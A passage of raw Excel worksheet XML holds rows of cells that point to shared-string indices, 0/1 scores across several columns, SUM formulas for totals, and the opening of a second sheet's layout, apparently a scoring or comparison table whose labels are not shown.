      <c r="B20" s="12" t="s">
        <v>40</v>
      </c>
      <c r="C20" s="12" t="s">
        <v>40</v>
      </c>
      <c r="D20" s="12">
        <v>1</v>
      </c>
      <c r="E20" s="12">
        <v>1</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>40</v>
      </c>
      <c r="G20" s="12">
        <v>1</v>
      </c>
      <c r="H20" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A21" s="11" t="s">
        <v>139</v>
      </c>
      <c r="B21" s="12" t="s">
        <v>155</v>
      </c>
      <c r="C21" s="12" t="s">
        <v>155</v>
      </c>
      <c r="D21" s="12">
        <v>1</v>
      </c>
      <c r="E21" s="12">
        <v>1</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>155</v>
      </c>
      <c r="G21" s="12">
        <v>1</v>
      </c>
      <c r="H21" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A22" s="11" t="s">
        <v>84</v>
      </c>
      <c r="B22" s="12" t="s">
        <v>114</v>
      </c>
      <c r="C22" s="12" t="s">
        <v>115</v>
      </c>
      <c r="D22" s="12">
        <v>0</v>
      </c>
      <c r="E22" s="12">
        <v>0</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>116</v>
      </c>
      <c r="G22" s="12">
        <v>0</v>
      </c>
      <c r="H22" s="12">
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A23" s="11" t="s">
        <v>140</v>
      </c>
      <c r="B23" s="12" t="s">
        <v>156</v>
      </c>
      <c r="C23" s="12" t="s">
        <v>156</v>
      </c>
      <c r="D23" s="12">
        <v>1</v>
      </c>
      <c r="E23" s="12">
        <v>1</v>
      </c>
      <c r="F23" s="12" t="s">
        <v>156</v>
      </c>
      <c r="G23" s="12">
        <v>1</v>
      </c>
      <c r="H23" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A24" s="11" t="s">
        <v>141</v>
      </c>
      <c r="B24" s="12" t="s">
        <v>157</v>
      </c>
      <c r="C24" s="12" t="s">
        <v>1305</v>
      </c>
      <c r="D24" s="12">
        <v>1</v>
      </c>
      <c r="E24" s="12">
        <v>1</v>
      </c>
      <c r="F24" s="12" t="s">
        <v>157</v>
      </c>
      <c r="G24" s="12">
        <v>1</v>
      </c>
      <c r="H24" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="11" t="s">
        <v>142</v>
      </c>
      <c r="B25" s="12" t="s">
        <v>158</v>
      </c>
      <c r="C25" s="12" t="s">
        <v>158</v>
      </c>
      <c r="D25" s="12">
        <v>1</v>
      </c>
      <c r="E25" s="12">
        <v>1</v>
      </c>
      <c r="F25" s="12" t="s">
        <v>158</v>
      </c>
      <c r="G25" s="12">
        <v>1</v>
      </c>
      <c r="H25" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A26" s="11" t="s">
        <v>143</v>
      </c>
      <c r="B26" s="12"/>
      <c r="C26" s="12"/>
      <c r="D26" s="12"/>
      <c r="E26" s="12"/>
      <c r="F26" s="12"/>
      <c r="G26" s="12"/>
      <c r="H26" s="12"/>
    </row>
    <row r="27" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A27" s="11" t="s">
        <v>144</v>
      </c>
      <c r="B27" s="12"/>
      <c r="C27" s="12"/>
      <c r="D27" s="12"/>
      <c r="E27" s="12"/>
      <c r="F27" s="12"/>
      <c r="G27" s="12"/>
      <c r="H27" s="12"/>
    </row>
    <row r="28" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A28" s="11" t="s">
        <v>21</v>
      </c>
      <c r="B28" s="12"/>
      <c r="C28" s="12"/>
      <c r="D28" s="12"/>
      <c r="E28" s="12"/>
      <c r="F28" s="12"/>
      <c r="G28" s="12"/>
      <c r="H28" s="12"/>
    </row>
    <row r="29" spans="1:8" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A29" s="11" t="s">
        <v>145</v>
      </c>
      <c r="B29" s="12"/>
      <c r="C29" s="12"/>
      <c r="D29" s="12"/>
      <c r="E29" s="12"/>
      <c r="F29" s="12"/>
      <c r="G29" s="12"/>
      <c r="H29" s="12"/>
    </row>
    <row r="30" spans="1:8" ht="17.399999999999999" x14ac:dyDescent="0.25">
      <c r="A30" s="15" t="s">
        <v>41</v>
      </c>
      <c r="B30" s="15"/>
      <c r="C30" s="15"/>
      <c r="D30" s="15">
        <f>SUM(D4:D29)</f>
        <v>19</v>
      </c>
      <c r="E30" s="15">
        <f t="shared" ref="E30:H30" si="0">SUM(E4:E29)</f>
        <v>18</v>
      </c>
      <c r="F30" s="15">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G30" s="15">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="H30" s="15">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A33" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B33" s="25"/>
      <c r="C33" s="25"/>
      <c r="D33" s="25"/>
      <c r="E33" s="25"/>
      <c r="F33" s="25"/>
      <c r="G33" s="25"/>
      <c r="H33" s="25"/>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B34" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C34" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D34" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E34" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F34" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G34" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H34" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="7" t="s">
        <v>45</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D35" s="13">
        <v>1</v>
      </c>
      <c r="E35" s="13">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G35" s="13">
        <v>1</v>
      </c>
      <c r="H35" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="7" t="s">
        <v>46</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D36" s="13">
        <v>1</v>
      </c>
      <c r="E36" s="13">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G36" s="13">
        <v>1</v>
      </c>
      <c r="H36" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A37" s="23" t="s">
        <v>47</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1059</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1130</v>
      </c>
      <c r="D37" s="13">
        <v>1</v>
      </c>
      <c r="E37" s="13">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1130</v>
      </c>
      <c r="G37" s="13">
        <v>1</v>
      </c>
      <c r="H37" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="24"/>
      <c r="B38" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="D38" s="13">
        <v>1</v>
      </c>
      <c r="E38" s="13">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="G38" s="13">
        <v>1</v>
      </c>
      <c r="H38" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="23" t="s">
        <v>48</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="D39" s="13">
        <v>1</v>
      </c>
      <c r="E39" s="13">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1139</v>
      </c>
      <c r="G39" s="13">
        <v>1</v>
      </c>
      <c r="H39" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="25.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A40" s="24"/>
      <c r="B40" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D40" s="13">
        <v>1</v>
      </c>
      <c r="E40" s="13">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G40" s="13">
        <v>1</v>
      </c>
      <c r="H40" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A41" s="7" t="s">
        <v>1098</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1112</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1306</v>
      </c>
      <c r="D41" s="13">
        <v>1</v>
      </c>
      <c r="E41" s="13">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1133</v>
      </c>
      <c r="G41" s="13">
        <v>1</v>
      </c>
      <c r="H41" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="23" t="s">
        <v>1099</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1899</v>
      </c>
      <c r="D42" s="13">
        <v>0</v>
      </c>
      <c r="E42" s="13">
        <v>0</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1899</v>
      </c>
      <c r="G42" s="13">
        <v>0</v>
      </c>
      <c r="H42" s="13">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="24"/>
      <c r="B43" s="3" t="s">
        <v>1123</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1898</v>
      </c>
      <c r="D43" s="13">
        <v>0</v>
      </c>
      <c r="E43" s="13">
        <v>0</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1898</v>
      </c>
      <c r="G43" s="13">
        <v>0</v>
      </c>
      <c r="H43" s="13">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="7" t="s">
        <v>1100</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1113</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1307</v>
      </c>
      <c r="D44" s="13">
        <v>1</v>
      </c>
      <c r="E44" s="13">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1134</v>
      </c>
      <c r="G44" s="13">
        <v>1</v>
      </c>
      <c r="H44" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="7" t="s">
        <v>1101</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1114</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1308</v>
      </c>
      <c r="D45" s="13">
        <v>1</v>
      </c>
      <c r="E45" s="13">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1135</v>
      </c>
      <c r="G45" s="13">
        <v>1</v>
      </c>
      <c r="H45" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="7" t="s">
        <v>1102</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="D46" s="13">
        <v>1</v>
      </c>
      <c r="E46" s="13">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="G46" s="13">
        <v>1</v>
      </c>
      <c r="H46" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A47" s="7" t="s">
        <v>1103</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1115</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1310</v>
      </c>
      <c r="D47" s="13">
        <v>1</v>
      </c>
      <c r="E47" s="13">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1310</v>
      </c>
      <c r="G47" s="13">
        <v>1</v>
      </c>
      <c r="H47" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="7" t="s">
        <v>1104</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1116</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1311</v>
      </c>
      <c r="D48" s="13">
        <v>1</v>
      </c>
      <c r="E48" s="13">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1136</v>
      </c>
      <c r="G48" s="13">
        <v>1</v>
      </c>
      <c r="H48" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A49" s="7" t="s">
        <v>1105</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1117</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1312</v>
      </c>
      <c r="D49" s="13">
        <v>1</v>
      </c>
      <c r="E49" s="13">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1137</v>
      </c>
      <c r="G49" s="13">
        <v>1</v>
      </c>
      <c r="H49" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="7" t="s">
        <v>1106</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="D50" s="13">
        <v>1</v>
      </c>
      <c r="E50" s="13">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="G50" s="13">
        <v>1</v>
      </c>
      <c r="H50" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A51" s="7" t="s">
        <v>1107</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1119</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1313</v>
      </c>
      <c r="D51" s="13">
        <v>1</v>
      </c>
      <c r="E51" s="13">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1119</v>
      </c>
      <c r="G51" s="13">
        <v>1</v>
      </c>
      <c r="H51" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A52" s="7" t="s">
        <v>1104</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>1116</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1311</v>
      </c>
      <c r="D52" s="13">
        <v>1</v>
      </c>
      <c r="E52" s="13">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1136</v>
      </c>
      <c r="G52" s="13">
        <v>1</v>
      </c>
      <c r="H52" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A53" s="7" t="s">
        <v>1108</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1117</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1312</v>
      </c>
      <c r="D53" s="13">
        <v>1</v>
      </c>
      <c r="E53" s="13">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1137</v>
      </c>
      <c r="G53" s="13">
        <v>1</v>
      </c>
      <c r="H53" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="7" t="s">
        <v>1106</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="D54" s="13">
        <v>1</v>
      </c>
      <c r="E54" s="13">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="G54" s="13">
        <v>1</v>
      </c>
      <c r="H54" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="7" t="s">
        <v>52</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>68</v>
      </c>
      <c r="D55" s="13">
        <v>1</v>
      </c>
      <c r="E55" s="13">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>68</v>
      </c>
      <c r="G55" s="13">
        <v>1</v>
      </c>
      <c r="H55" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="7" t="s">
        <v>1044</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D56" s="13">
        <v>1</v>
      </c>
      <c r="E56" s="13">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G56" s="13">
        <v>1</v>
      </c>
      <c r="H56" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A57" s="23" t="s">
        <v>1109</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>69</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1132</v>
      </c>
      <c r="D57" s="13">
        <v>1</v>
      </c>
      <c r="E57" s="13">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>69</v>
      </c>
      <c r="G57" s="13">
        <v>1</v>
      </c>
      <c r="H57" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A58" s="24"/>
      <c r="B58" s="3" t="s">
        <v>1124</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>1124</v>
      </c>
      <c r="D58" s="13">
        <v>1</v>
      </c>
      <c r="E58" s="13">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>1124</v>
      </c>
      <c r="G58" s="13">
        <v>1</v>
      </c>
      <c r="H58" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="23" t="s">
        <v>1110</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1129</v>
      </c>
      <c r="D59" s="13">
        <v>1</v>
      </c>
      <c r="E59" s="13">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="G59" s="13">
        <v>1</v>
      </c>
      <c r="H59" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="24"/>
      <c r="B60" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D60" s="13">
        <v>1</v>
      </c>
      <c r="E60" s="13">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="G60" s="13">
        <v>1</v>
      </c>
      <c r="H60" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="151.80000000000001" x14ac:dyDescent="0.25">
      <c r="A61" s="7" t="s">
        <v>1111</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1120</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1314</v>
      </c>
      <c r="D61" s="13">
        <v>1</v>
      </c>
      <c r="E61" s="13">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1138</v>
      </c>
      <c r="G61" s="13">
        <v>1</v>
      </c>
      <c r="H61" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" s="15" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.25">
      <c r="A62" s="15" t="s">
        <v>41</v>
      </c>
      <c r="D62" s="15">
        <f>SUM(D35:D61)</f>
        <v>25</v>
      </c>
      <c r="E62" s="15">
        <f t="shared" ref="E62:H62" si="1">SUM(E35:E61)</f>
        <v>25</v>
      </c>
      <c r="F62" s="15">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G62" s="15">
        <f t="shared" si="1"/>
        <v>25</v>
      </c>
      <c r="H62" s="15">
        <f t="shared" si="1"/>
        <v>25</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A59:A60"/>
    <mergeCell ref="A33:H33"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A37:A38"/>
    <mergeCell ref="A39:A40"/>
    <mergeCell ref="A42:A43"/>
    <mergeCell ref="A57:A58"/>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3BA46-F3D4-403E-879E-1ECB82CD6BAE}">
  <dimension ref="A1:H46"/>
  <sheetViews>
    <sheetView topLeftCell="A40" workbookViewId="0">
      <selection activeCell="J45" sqref="J45"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="21.109375" customWidth="1"/>
    <col min="2" max="2" width="21.88671875" customWidth="1"/>
    <col min="3" max="3" width="17.6640625" customWidth="1"/>
    <col min="4" max="5" width="10.44140625" customWidth="1"/>
    <col min="6" max="6" width="16.88671875" customWidth="1"/>
    <col min="7" max="7" width="10" customWidth="1"/>
    <col min="8" max="8" width="10.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="30" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>159</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ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A4" s="11" t="s">
        <v>104</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>105</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>105</v>
      </c>
      <c r="D4" s="12">
        <v>1</v>
      </c>
      <c r="E4" s="12">
        <v>1</v>
      </c>
      <c r="F4" s="12" t="s">
        <v>103</v>
      </c>
      <c r="G4" s="12">
        <v>1</v>
      </c>
      <c r="H4" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="82.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A5" s="11" t="s">
        <v>7</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>22</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>1901</v>
      </c>
      <c r="D5" s="12">
        <v>0</v>
      </c>
      <c r="E5" s="12">
        <v>0</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>24</v>
      </c>
      <c r="G5" s="12">
        <v>1</v>
      </c>
      <c r="H5" s="12">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="11" t="s">
        <v>8</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="D6" s="12">
        <v>1</v>
      </c>
      <c r="E6" s="12">
        <v>1</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="G6" s="12">
        <v>1</v>
      </c>
      <c r="H6" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="11" t="s">
        <v>9</v>
      </c>
      <c r="B7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="D7" s="12">
        <v>1</v>
      </c>
      <c r="E7" s="12">
        <v>1</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="G7" s="12">
        <v>1</v>
      </c>
      <c r="H7" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A8" s="11" t="s">
        <v>160</v>
      </c>
      <c r="B8" s="12"/>
      <c r="C8" s="12"/>
      <c r="D8" s="12"/>
      <c r="E8" s="12"/>
      <c r="F8" s="12"/>
      <c r="G8" s="12"/>
      <c r="H8" s="12"/>
    </row>
    <row r="9" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A9" s="11" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="12" t="s">
        <v>29</v>
      </c>
      <c r="C9" s="12" t="s">
        <v>31</v>
      </c>
      <c r="D9" s="12">
        <v>1</v>
      </c>
      <c r="E9" s="12">
        <v>1</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>31</v>
      </c>
      <c r="G9" s="12">
        <v>1</v>
      </c>
      <c r="H9" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A10" s="11" t="s">
        <v>82</v>
      </c>
      <c r="B10" s="12" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="12" t="s">
        <v>38</v>
      </c>
      <c r="D10" s="12">
        <v>1</v>
      </c>
      <c r="E10" s="12">
        <v>1</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G10" s="12">
        <v>1</v>
      </c>
      <c r="H10" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A11" s="11" t="s">
        <v>83</v>
      </c>
      <c r="B11" s="12" t="s">
        <v>112</v>
      </c>
      <c r="C11" s="12" t="s">
        <v>113</v>
      </c>
      <c r="D11" s="12">
        <v>1</v>
      </c>
      <c r="E11" s="12">
        <v>1</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>112</v>
      </c>
      <c r="G11" s="12">
        <v>1</v>
      </c>
      <c r="H11" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="66" x14ac:dyDescent="0.25">
      <c r="A12" s="11" t="s">
        <v>161</v>
      </c>
      <c r="B12" s="12" t="s">
        <v>164</v>
      </c>
      <c r="C12" s="12" t="s">
        <v>1900</v>
      </c>
      <c r="D12" s="12">
        <v>0</v>
      </c>
      <c r="E12" s="12">
        <v>0</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>165</v>
      </c>
      <c r="G12" s="12">
        <v>1</v>
      </c>
      <c r="H12" s="12">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A13" s="11" t="s">
        <v>17</v>
      </c>
      <c r="B13" s="12" t="s">
        <v>40</v>
      </c>
      <c r="C13" s="12" t="s">
        <v>40</v>
      </c>
      <c r="D13" s="12">
        <v>1</v>
      </c>
      <c r="E13" s="12">
        <v>1</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>40</v>
      </c>
      <c r="G13" s="12">
        <v>1</v>
      </c>
      <c r="H13" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="66" x14ac:dyDescent="0.25">
      <c r="A14" s="11" t="s">
        <v>139</v>
      </c>
      <c r="B14" s="12" t="s">
        <v>155</v>
      </c>
      <c r="C14" s="12" t="s">
        <v>1315</v>
      </c>
      <c r="D14" s="12">
        <v>1</v>
      </c>
      <c r="E14" s="12">
        <v>1</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>155</v>
      </c>
      <c r="G14" s="12">
        <v>1</v>
      </c>
      <c r="H14" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="66" x14ac:dyDescent="0.25">
      <c r="A15" s="11" t="s">
        <v>162</v>
      </c>
      <c r="B15" s="12" t="s">
        <v>167</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>167</v>
      </c>
      <c r="D15" s="12">
        <v>1</v>
      </c>
      <c r="E15" s="12">
        <v>1</v>
      </c>
      <c r="F15" s="12" t="s">
        <v>167</v>
      </c>
      <c r="G15" s="12">
        <v>1</v>
      </c>
      <c r="H15" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A16" s="11" t="s">
        <v>163</v>
      </c>
      <c r="B16" s="12"/>
      <c r="C16" s="12"/>
      <c r="D16" s="12"/>
      <c r="E16" s="12"/>
      <c r="F16" s="12"/>
      <c r="G16" s="12"/>
      <c r="H16" s="12"/>
    </row>
    <row r="17" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A17" s="11" t="s">
        <v>20</v>
      </c>
      <c r="B17" s="12"/>
      <c r="C17" s="12"/>
      <c r="D17" s="12"/>
      <c r="E17" s="12"/>
      <c r="F17" s="12"/>
      <c r="G17" s="12"/>
      <c r="H17" s="12"/>
    </row>
    <row r="18" spans="1:8" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A18" s="11" t="s">
        <v>21</v>
      </c>
      <c r="B18" s="12"/>
      <c r="C18" s="12"/>
      <c r="D18" s="12"/>
      <c r="E18" s="12"/>
      <c r="F18" s="12"/>
      <c r="G18" s="12"/>
